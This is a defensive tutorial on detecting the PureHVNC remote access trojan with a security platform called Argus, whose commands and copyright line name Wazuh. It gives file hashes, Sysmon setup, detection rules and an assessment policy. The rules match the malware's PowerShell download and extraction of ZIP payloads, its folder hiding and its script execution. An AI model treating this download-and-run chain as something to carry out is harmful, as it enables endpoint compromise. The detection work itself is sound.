View Categories

Detecting PureHVNC malware with Argus

12 min read

PureHVNC is a covert Remote Access Trojan (RAT) that allows attackers to control Windows endpoints without user detection. The HVNC in PureHVNC stands for “Hidden Virtual Network Computing”. Typically delivered through phishing emails with malicious attachments, it activates upon execution. The malware downloads and opens a decoy PDF, retrieves two ZIP files (DXJS.zip and FTSP.zip) via PowerShell, and extracts their contents into hidden folders within the user’s Downloads directory. It then runs multiple Python scripts (such as money.py, update.py, and others) from the extracted files and reopens the decoy PDF to sustain the ruse. Additionally, PureHVNC establishes communication with a command-and-control (C2) server, enabling attackers to execute remote commands on the infected system.

ANALYZED IOC

  Type  Value
  Hash (SHA256)  441c4502584240624f4af6d67eded476c781ff0b72afe95ea236cc87a50e5650
  MD5  372d3835bc694a7d9934727030bf7be6

REQUIREMENTS

  • Argus server or Argus manager
  • A windows victim endpoint with Argus agent installed

DETECTION WITH ARGUS

Argus capabilities to detect PureHVNC malware on an infected Windows endpoint:

• Using custom detection rules to detect PureHVNC malware activities.

•Using the Argus Security Configuration Assessment (SCA) module to check for the presence of PureHVNC malware artifacts.

DETECTION CRITERIA

  • Use Sysmon to monitor several system events on the windows endpoint
  • Create rules on the Argus server to detect the malicious activities of PureHVNC malware.

Windows endpoint

Steps to configure the Sysmon on the endpoint and forward logs in the Sysmon event channel to Argus server for analysis

  1. Download Sysmon from https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon
  2. Extract the compressed Sysmon file to your location
  3. By using Powershell download the Sysmon Configuration file-sysmonconfig.xml. Replace <SYSMON_EXECUTABLE_PATH> with the path to your Sysmon executable.

wget -Uri https://wazuh.com/resources/blog/emulation-of-attack-techniques-and-detection-with-wazuh/sysmonconfig.xml -OutFile <SYSMON_EXECUTABLE_PATH>\sysmonconfig.xml

  • Switch to the directory with the Sysmon executable. Run the command below to install and start Sysmon using PowerShell with Administrator privileges:

.\Sysmon64.exe -accepteula -i sysmonconfig.xml

  • Add the following configuration within the <ossec_config> block of the C:\Program Files (x86)\ossec-agent\ossec.conf file to forward Sysmon events to the Argus server:

<localfile>

    <location>Microsoft-Windows-Sysmon/Operational</location>

    <log_format>eventchannel</log_format>

</localfile>

  • Restart the Argus agent

Restart-Service -Name wazuh

Argus server

Create rules to detect the Pure HVNC malware behavior on the endpoint

  1. Create a file purehvnc_malware.xml in the /var/ossec/etc/rules/ directory

$ nano /var/ossec/etc/rules/purehvnc_malware.xml   

  • Add the rules to the /var/ossec/etc/rules/purehvnc_malware.xml file:

        <group name=”purehvnc,malware,”>

     <rule id=”100201″ level=”12″>

         <if_sid>61603</if_sid>

         <field name=”win.eventdata.Image” type=”pcre2″>(?i)timeout\.exe</field>

         <field name=”win.eventdata.CommandLine” type=”pcre2″>\/t 5</field>

         <field name=”win.eventdata.CommandLine”

            type=”pcre2″>REM\sWait\sfor\sPDF\sto\sopen</field>

         <description>Possible PureHVNC malware activity: PDF delayed execution       with timeout.exe.</description>

    <mitre>

      <id>T1059</id>

    </mitre>

  </rule>

  <rule id=”100202″ level=”12″>

    <if_sid>61603</if_sid>

    <field name=”win.eventdata.Image” type=”pcre2″>(?i)powershell\.exe</field>

    <field name=”win.eventdata.CommandLine” type=”pcre2″>Net.ServicePointManager</field>

    <field name=”win.eventdata.CommandLine” type=”pcre2″>Net.SecurityProtocolType</field>

    <field name=”win.eventdata.CommandLine” type=”pcre2″>Invoke-WebRequest\s-Uri</field>

    <field name=”win.eventdata.CommandLine” type=”pcre2″>DXJS.zip</field>

    <description>Possible PureHVNC malware activity: Suspicious ZIP file DXJS.zip downloaded from a remote file share.</description>

    <mitre>

      <id>T1105</id>

    </mitre>

  </rule>

  <rule id=”100203″ level=”15″>

    <if_sid>61603</if_sid>

    <field name=”win.eventdata.Image” type=”pcre2″>(?i)powershell\.exe</field>

    <field name=”win.eventdata.CommandLine” type=”pcre2″>Expand-Archive</field>

    <field name=”win.eventdata.CommandLine” type=”pcre2″>\-DestinationPath</field>

    <field name=”win.eventdata.CommandLine” type=”pcre2″>DXJS.zip</field>

    <field name=”win.eventdata.CommandLine” type=”pcre2″>\-Force</field>

    <description>Possible PureHVNC malware activity: Suspicious ZIP file DXJS.zip extracted.</description>

    <mitre>

      <id>T1059.001</id>

    </mitre>

  </rule>

  <rule id=”100204″ level=”15″>

    <if_sid>61603</if_sid>

    <field name=”win.eventdata.Image” type=”pcre2″>(?i)attrib\.exe</field>

    <field name=”win.eventdata.CommandLine” type=”pcre2″>\+h</field>

    <description>Possible PureHVNC malware activity: Suspicious folder hiding activity.</description>

    <mitre>

      <id>T1564.001</id>

    </mitre>  

  </rule>

  <rule id=”100205″ level=”15″>

    <if_sid>61603</if_sid>

    <field name=”win.eventdata.Image” type=”pcre2″>(?i)AppInstallerPythonRedirector\.exe</field>

    <field name=”win.eventdata.CommandLine” type=”pcre2″>python\.exe</field>

    <field name=”win.eventdata.CommandLine” type=”pcre2″>(?i)(money|update|upload|time|kam|moment|info)\.py</field>

    <description>Possible PureHVNC malware activity: Suspicious Python script executed.</description>

    <mitre>

      <id>T1059.006</id>

    </mitre>   

  </rule>

  <rule id=”100206″ level=”12″>

    <if_sid>61603</if_sid>

    <field name=”win.eventdata.Image” type=”pcre2″>(?i)powershell\.exe</field>

    <field name=”win.eventdata.CommandLine” type=”pcre2″>Net.ServicePointManager</field>

    <field name=”win.eventdata.CommandLine” type=”pcre2″>Net.SecurityProtocolType</field>

    <field name=”win.eventdata.CommandLine” type=”pcre2″>Invoke-WebRequest\s-Uri</field>

    <field name=”win.eventdata.CommandLine” type=”pcre2″>FTSP.zip</field>

    <description>Possible PureHVNC malware activity: Suspicious ZIP file FTSP.zip downloaded from a remote file share.</description>

    <mitre>

      <id>T1105</id>

    </mitre>

  </rule>

  <rule id=”100207″ level=”15″>

    <if_sid>61603</if_sid>

    <field name=”win.eventdata.Image” type=”pcre2″>(?i)powershell\.exe</field>

    <field name=”win.eventdata.CommandLine” type=”pcre2″>Expand-Archive</field>

    <field name=”win.eventdata.CommandLine” type=”pcre2″>\-DestinationPath</field>

    <field name=”win.eventdata.CommandLine” type=”pcre2″>FTSP.zip</field>

    <field name=”win.eventdata.CommandLine” type=”pcre2″>\-Force</field>

    <description>Possible PureHVNC malware activity: Suspicious ZIP file FTSP.zip extracted.</description>

    <mitre>

      <id>T1059.001</id>

    </mitre>

  </rule>

</group>

  • Restart the Argus manager

                       systemctl restart wazuh-manager 

Detection results

  1. Navigate to Threat Hunting > Events
  2. Click on Add filter
  3. Filter for rule.id in the Field
  4. Filter for is one of Operator and give 100201,100202,100203,100204,100205,100206,100207 in the Values field
  5. Click on Save

Security configuration assessment (SCA)

The Argus SCA module assesses system configurations by comparing them to a predefined set of rules and benchmarks. It conducts checks to verify system hardening, identify vulnerable software, and ensure configuration policies are properly applied on monitored endpoints. By leveraging the SCA module, organizations can strengthen their security posture, maintain compliance with industry standards, and minimize the risk of security breaches.

Windows endpoint

We configure the Argus SCA module to check for the presence of PureHVNC malware artifacts on the Windows endpoint.

  1. Launch PowerShell with administrative privilege and create a folder to store custom SCA policy files:

> New-Item -Path “C:\Program Files (x86)\” -Name “sca_policies” -ItemType Directory

  • Create a file purehvnc_malware_check.yml in the C:\Program Files (x86)\sca_policies folder:

> New-Item -Path ‘C:\Program Files (x86)\sca_policies\purehvnc_malware_check.yml’ -ItemType File

  •  Add the following content to the C:\Program Files (x86)\sca_policies\purehvnc_malware_check.yml file:

     # Security Configuration Assessment

# Audit for PureHVNC malware

# Copyright (C) 2024, Wazuh Inc.

#

# This program is free software; you can redistribute it

# and/or modify it under the terms of the GNU General Public

# License (version 2) as published by the FSF – Free Software

# Foundation

policy:

  id: “PureHVNC_malware”

  file: “purehvnc_malware_check.yml”

  name: “PureHVNC malware Windows OS check”

  description: “Detecting PureHVNC malware”

requirements:

  title: “Checking PureHVNC malware on Windows based systems”

  description: “Requirements for running the audit policy under a Windows platform”

  condition: all

  rules:

    – ‘r:HKEY_LOCAL_MACHINE\SAM\SAM’

checks:

  – id: 77000

    title: “Checking for Possible PureHVNC malware artifacts (ZIP files) in Downloads folder”

    description: “Check for ZIP files associated with PureHVNC malware in Downloads folder.”

    remediation: “Delete the files DXJS.zip and FTSP.zip from the Downloads folder.”

    condition: all

    rules:

      – ‘not f:C:\Users\<USERNAME>\Downloads\DXJS.zip’

      – ‘not f:C:\Users\<USERNAME>\Downloads\FTSP.zip’

  – id: 77001

    title: “Checking for Possible PureHVNC malware artifacts (Python scripts) in Downloads folder”

    description: “Check for Python scripts associated with PureHVNC malware in Downloads folder.”

    remediation: “Delete the Python scripts and the Python folder from the Downloads folder.”

    condition: all

    rules:

      – ‘not f:C:\Users\<USERNAME>\Downloads\Python\Python312\money.py’

      – ‘not f:C:\Users\<USERNAME>\Downloads\Python\Python312\update.py’

      – ‘not f:C:\Users\<USERNAME>\Downloads\Python\Python312\upload.py’

      – ‘not f:C:\Users\<USERNAME>\Downloads\Python\Python312\time.py’

      – ‘not f:C:\Users\<USERNAME>\Downloads\Python\Python312\kam.py’

      – ‘not f:C:\Users\<USERNAME>\Downloads\Python\Python312\moment.py’

      – ‘not f:C:\Users\<USERNAME>\Downloads\Python\Python312\info.py’

  – id: 77002

    title: “Checking for Possible PureHVNC malware artifacts (batch file) in Downloads folder”

    description: “Check for batch file associated with PureHVNC malware in Downloads folder.”

    remediation: “Delete the startuppp.bat file from the Downloads folder.”

    condition: all

    rules:

      – ‘not f:C:\Users\<USERNAME>\Downloads\startuppp.bat’

  – id: 77003

    title: “Checking for Possible PureHVNC malware artifacts (folders) in Downloads folder”

    description: “Check for folders associated with PureHVNC malware in Downloads folder.”

    remediation: “Delete the Python and Print folders from the Downloads folder.”

    condition: all

    rules:

      – ‘not d:C:\Users\<USERNAME>\Downloads\Python’

      – ‘not d:C:\Users\<USERNAME>\Downloads\Print’

  • Edit the Argus agent C:\Program Files (x86)\ossec-agent\ossec.conf file and include the following configuration within the <sca> block:

<policies>

  <policy>C:\Program Files (x86)\sca_policies\purehvnc_malware_check.yml</policy>

</policies>

  • Restart the Argus agent

   > Restart-Service -Name WazuhSvc

Monitoring the Alerts

Navigate to the Configuration Assessment page on the Argus dashboard. Select the monitored Windows endpoint, then select PureHVNC malware Windows OS check to view the scan results.

A Failed result indicates that the PureHVNC malware artifacts were detected on the endpoint. Conversely, a Passed result indicates that the PureHVNC malware artifacts were not detected and that the endpoint meets the SCA policy criteria.

Conclusion

This usecase demonstrates how to detect PureHVNC malware using Argus and the Argus SCA module to detect PureHVNC malware and its malicious activities.

Leave a Reply

Your email address will not be published. Required fields are marked *